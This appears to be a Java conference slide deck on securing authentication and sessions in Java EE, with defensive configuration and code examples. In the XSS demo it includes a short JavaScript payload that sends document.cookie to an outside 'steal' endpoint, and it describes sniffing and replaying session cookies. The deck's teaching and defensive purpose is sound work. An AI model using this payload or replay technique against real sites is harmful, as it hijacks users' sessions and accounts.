Secure Authentication and Session Management in Java EE
Patrycja Wegrzynowicz
CTO, Yonita, Inc.
Java Day Kiev 2015
(c) Patrycja Wegrzynowicz
@yonlabs
About Me
• 15+ years of professional experience
• Software engineer, architect, head of software R&D
• Author and speaker
  • JavaOne, Devoxx, JavaZone, TheServerSide Java Symposium, Jazoon, OOPSLA, ASE, others
• Finalizing PhD in Computer Science
• Founder and CTO of Yonita
  • Bridge the gap between the industry and the academia
  • Automated detection and refactoring of software defects
  • Trainings and code reviews
  • Security, performance, concurrency, databases
• Twitter: @yonlabs
Agenda
• HTTP, session, OWASP
• 4 demos to hijack a session
• Best practices in Java EE
Security Stories 2014/2015
#!/bin/bash
HTTP
What is a Web Session?
• A session identifies the interactions with one user
• A unique identifier is associated with every request, carried as a
  • Cookie
  • Header
  • Parameter
  • Hidden field
OWASP Top 10 Risks
Session Hijacking
• Session theft
  • URL, sniffing, logs, XSS
• Session fixation
• Session prediction
Demo: Session Exposed in URL
• I will log into the sample application
• I will post a link with my session id on Twitter
  • @yonlabs
• Hijack my session :)
How to Avoid the Session Id in the URL?
• Default: the container allows both cookies and URL rewriting
  • Cookie by default, falling back on URL rewriting
  • To embrace all users, including those with cookies disabled in the browser
• Disable URL rewriting in the app server
  • App server specific
• Tracking mode
  • Java EE 6, web.xml (portable)
web.xml
<!-- Java EE 6, Servlet 3.0 -->
<session-config>
    <tracking-mode>COOKIE</tracking-mode>
</session-config>
Session Sniffing
• How to find out a cookie?
  • e.g., network monitoring and packet sniffing
• How to use a cookie?
  • Browser plugins and add-ons (e.g., Cookie Manager for Firefox)
  • Intercepting proxy (e.g., OWASP ZAP)
  • DIY: write your own code
Demo: Session Sniffing
• You will log into the sample application
  • Any non-empty user name
  • Please use meaningful names, the victim will get a geecoin!
• I will monitor network traffic
  • tcpdump
• I will hijack one of your sessions
  • Cookie Manager
How to Avoid Session Exposure During Transport?
Encrypt! Use HTTPS.
web.xml
<security-constraint>
    <!-- the schema requires a resource collection; /* puts the whole app under the constraint -->
    <web-resource-collection>
        <web-resource-name>whole application</web-resource-name>
        <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <user-data-constraint>
        <!-- CONFIDENTIAL: the container redirects plain HTTP requests to HTTPS -->
        <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
</security-constraint>
web.xml
<!-- Java EE 6, Servlet 3.0 -->
<session-config>
    <cookie-config>
        <secure>true</secure>
    </cookie-config>
    <tracking-mode>COOKIE</tracking-mode>
</session-config>
Session Exposure
• Transport
  • Unencrypted transport
• Client-side
  • XSS
  • Attacks on browsers/OS
• Server-side
  • Logs
  • Session replication
  • Memory dump
How to Steal a Session if Secure Transport Is Used?
Attack a client!
Demo: Session Grabbed by XSS
• JavaScript code to steal a cookie
• Servlet to log the stolen cookies
• Vulnerable application to be exploited via injected JavaScript code (XSS)
Demo: Session Grabbed by XSS
• I will store malicious JavaScript code in the app
  • Through writing an "opinion"
• Log into the vulnerable application
  • https://demo.yonita.com:8181/session-xss/
  • Any non-empty user name
  • Please use meaningful names, the victim will get a geecoin!
• Click the 'View others' opinions' page
• Wait until I hijack your session :)
JavaScript to Steal a Cookie
<script>
// hacker's service
theft = 'http://demo.yonita.com/steal/steal?cookie=';
// to bypass the Same Origin Policy: an image load is a plain GET the browser
// sends to any origin, so the cookie travels in the query string
image = new Image();
image.src = theft + document.cookie;
</script>
web.xml
<!-- Java EE 6, Servlet 3.0 -->
<session-config>
    <cookie-config>
        <http-only>true</http-only>
        <secure>true</secure>
    </cookie-config>
    <tracking-mode>COOKIE</tracking-mode>
</session-config>
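The three web.xml fragments above (cookie-only tracking, the secure flag, the http-only flag) can also be set from code, which is handy when the settings must be enforced in every deployment regardless of what the descriptor says. The listener below is an added example, not code from the talk; it assumes a Servlet 3.0 or later container (javax.servlet API), and the class name is chosen here.

```java
import java.util.EnumSet;

import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import javax.servlet.SessionCookieConfig;
import javax.servlet.SessionTrackingMode;
import javax.servlet.annotation.WebListener;

/**
 * Added example (not from the talk): programmatic equivalent of the
 * session-config shown in web.xml. Assumes Servlet 3.0+; the class name
 * is an assumption of this example.
 */
@WebListener
public class SessionCookieHardening implements ServletContextListener {

    @Override
    public void contextInitialized(ServletContextEvent sce) {
        ServletContext ctx = sce.getServletContext();

        // <tracking-mode>COOKIE</tracking-mode>: never fall back to URL rewriting,
        // so the session id cannot end up in links, logs or Referer headers
        ctx.setSessionTrackingModes(EnumSet.of(SessionTrackingMode.COOKIE));

        // <cookie-config>: JSESSIONID unreadable by script, sent only over TLS
        SessionCookieConfig cookie = ctx.getSessionCookieConfig();
        cookie.setHttpOnly(true);   // <http-only>true</http-only>
        cookie.setSecure(true);     // <secure>true</secure>

        // Keep the cookie path as narrow as the application: a path of "/"
        // would hand the cookie to every other app deployed on the same host
        String path = ctx.getContextPath();
        cookie.setPath(path.isEmpty() ? "/" : path);
    }

    @Override
    public void contextDestroyed(ServletContextEvent sce) {
        // nothing to release
    }
}
```

These setters may only be called while the context is still initializing, which is exactly where a ServletContextListener runs; calling them later throws IllegalStateException. To verify the result, look at the Set-Cookie header of the login response in the browser's developer tools: it must carry both `Secure` and `HttpOnly`, and no `;jsessionid=` should ever appear in a rendered link.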
Session Fixation: Scenario
• Hacker opens a web page of the system in a browser
  • A new session is initialized
• Hacker writes down the session id
• Hacker leaves the browser open
• User comes and logs into the app
  • Uses the session initialized by the hacker
• Hacker uses the written-down session id to hijack the user's session
Session Fixation: Solution
• Change the session id after a successful login
  • More generally: after any escalation of privileges
• Java EE 7 (Servlet 3.1)
  • HttpServletRequest.changeSessionId()
• Java EE 6
  • HttpSession.invalidate()
  • HttpServletRequest.getSession(true)
Secure Session Management: Best Practices
• Random, unpredictable session id
  • At least 16 characters
• Secure transport and storage of the session id
  • Cookie preferred over URL rewriting
  • Cookie flags: secure, httpOnly
  • Consistent use of HTTPS (how do you serve static content?)
  • Don't mix HTTP and HTTPS under the same domain/cookie path
  • Don't use too broad cookie paths
Secure Authentication: Best Practices
• Session creation and destruction
  • New session id after login
  • Logout button
  • Session timeouts: 2-5 minutes for critical apps, 15-30 minutes for typical apps
• Session associated with the headers of the first request
  • IP, User-Agent, ...
  • If they don't match, something's going on (invalidate!)
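The last point, binding a session to the client seen on its first request and invalidating on mismatch, is a few lines in a servlet filter. The filter below is an added example, not code from the talk; it assumes the javax.servlet 3.x API, and the class and attribute names are chosen here.

```java
import java.io.IOException;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

/**
 * Added example (not from the talk): remembers the remote IP and User-Agent
 * of the first request that used a session and invalidates the session when
 * a later request with the same id comes from somewhere else.
 * Class and attribute names are assumptions of this example.
 */
@WebFilter("/*")
public class SessionBindingFilter implements Filter {

    static final String FINGERPRINT_ATTR = "session.fingerprint";

    @Override public void init(FilterConfig config) { }
    @Override public void destroy() { }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;

        HttpSession session = request.getSession(false); // never create one just to check it
        if (session != null) {
            String current = fingerprint(request);
            String stored = (String) session.getAttribute(FINGERPRINT_ATTR);
            if (stored == null) {
                // first request seen for this session: remember whom it belongs to
                session.setAttribute(FINGERPRINT_ATTR, current);
            } else if (!stored.equals(current)) {
                // same session id, different client: treat it as a hijacked session
                session.invalidate();
                response.sendError(HttpServletResponse.SC_FORBIDDEN);
                return;
            }
        }
        chain.doFilter(req, res);
    }

    /** The request properties a replayed cookie alone does not reproduce. */
    static String fingerprint(HttpServletRequest request) {
        String userAgent = request.getHeader("User-Agent");
        return request.getRemoteAddr() + "|" + (userAgent == null ? "" : userAgent);
    }
}
```

A cookie sniffed with tcpdump and replayed from another machine now gets a 403 and the session is gone. The check is only a layer, not a replacement for HTTPS and HttpOnly: an attacker on the same NAT who also copies the User-Agent passes it. Two deployment caveats: behind a reverse proxy `getRemoteAddr()` is the proxy's address, so the IP part of the fingerprint only works if the proxy's forwarded-for header is trusted and used instead, and mobile users change IP addresses legitimately, so many applications bind on User-Agent alone and log (rather than block) IP changes.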
Secure Authentication: Best Practices cont.
• Java EE
  • Declarative authentication implemented using annotations or descriptors
    • Does not force a new session id after login (session fixation possible, app server specific)
  • Programmatic authentication
    • Java EE 7, Servlet 3.1
    • HttpServletRequest: authenticate, login, logout
    • Advanced flows and requirements
Secure Authentication: Best Practices cont.
• My choice
  • Programmatic authentication with Java EE 7
    • HttpServletRequest: authenticate, login, logout
  • Declarative authorization
    • web.xml
    • @RolesAllowed, @PermitAll, @DenyAll
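The session-fixation fix from the earlier slide and the programmatic authentication chosen here fit in one servlet: authenticate through the container, then renew the session id before anything privileged is stored in it. The servlet below is an added example, not code from the talk; it assumes a Servlet 3.1 container with a realm configured so that request.login() works, a form posting "username" and "password", and the paths "/login" and "/home", all chosen here. The Java EE 6 variant (invalidate and re-create) is included as a separate method for containers without changeSessionId().

```java
import java.io.IOException;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

/**
 * Added example (not from the talk): programmatic login/logout with the
 * Servlet 3.1 API, issuing a new session id right after a successful login
 * so that an id fixed before authentication never survives it.
 * Realm, form field names and paths are assumptions of this example.
 */
@WebServlet("/login")
public class LoginServlet extends HttpServlet {

    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        if ("logout".equals(request.getParameter("action"))) {
            logout(request, response);
            return;
        }
        String username = request.getParameter("username");
        String password = request.getParameter("password");
        try {
            // Servlet 3.1: validates the credentials against the container's realm
            request.login(username, password);
        } catch (ServletException failed) {
            // same answer for unknown user and wrong password: no user enumeration
            response.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }
        // privilege level just changed: the pre-login session id must not live on
        renewSessionId(request);
        response.sendRedirect(request.getContextPath() + "/home");
    }

    /** Logout button: drop the principal and the whole session, not just the user attribute. */
    private void logout(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        request.logout();
        HttpSession session = request.getSession(false);
        if (session != null) {
            session.invalidate();
        }
        response.sendRedirect(request.getContextPath() + "/");
    }

    /** Java EE 7 / Servlet 3.1: new id, same session object and attributes. */
    static String renewSessionId(HttpServletRequest request) {
        request.getSession(); // changeSessionId() requires an existing session
        return request.changeSessionId();
    }

    /**
     * Java EE 6 / Servlet 3.0 equivalent: invalidate and re-create, carrying over
     * the attributes that should survive the login (e.g. a shopping cart).
     */
    static HttpSession recreateSession(HttpServletRequest request) {
        HttpSession old = request.getSession();
        Map<String, Object> kept = new HashMap<>();
        for (String name : Collections.list(old.getAttributeNames())) {
            kept.put(name, old.getAttribute(name));
        }
        old.invalidate();
        HttpSession fresh = request.getSession(true);
        for (Map.Entry<String, Object> e : kept.entrySet()) {
            fresh.setAttribute(e.getKey(), e.getValue());
        }
        return fresh;
    }
}
```

With declarative FORM authentication the container decides whether the id is renewed, which is why the slide calls the fixation risk app server specific; here the renewal is in application code and testable: the JSESSIONID value in the login response's Set-Cookie header must differ from the one the browser sent. Authorization stays declarative (security constraints in web.xml or the role annotations), so this servlet never checks roles itself.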

What If We Can't Steal a Cookie?
We can still use it!
Demo: CSRF to Use a Cookie
• I will log into the application
• Log into the application
  • https://demo.yonita.com:8181/session-csrf/
  • Any non-empty user name
  • Please use meaningful names, the first victim will get a geecoin!
• Click the link and the button 'Click me'
  • https://demo.yonita.com:8181/attack-csrf/
• I will check my account balance :)
CSRF: Solution
• Unique token associated with each form
  • Java EE (JSF): turned on by default
  • Any other modern framework
• Remember about REST/other services
Conclusion
You are never safe!
Continuous Integration
Continuous Refactoring
Continuous Learning!
A fool with a tool is still a fool!
Q&A
• patrycja@yonita.com
• Twitter: @yonlabs
• Upcoming trainings: How to attack and secure web apps in Java?
  Warszawa 15-16.12.2015
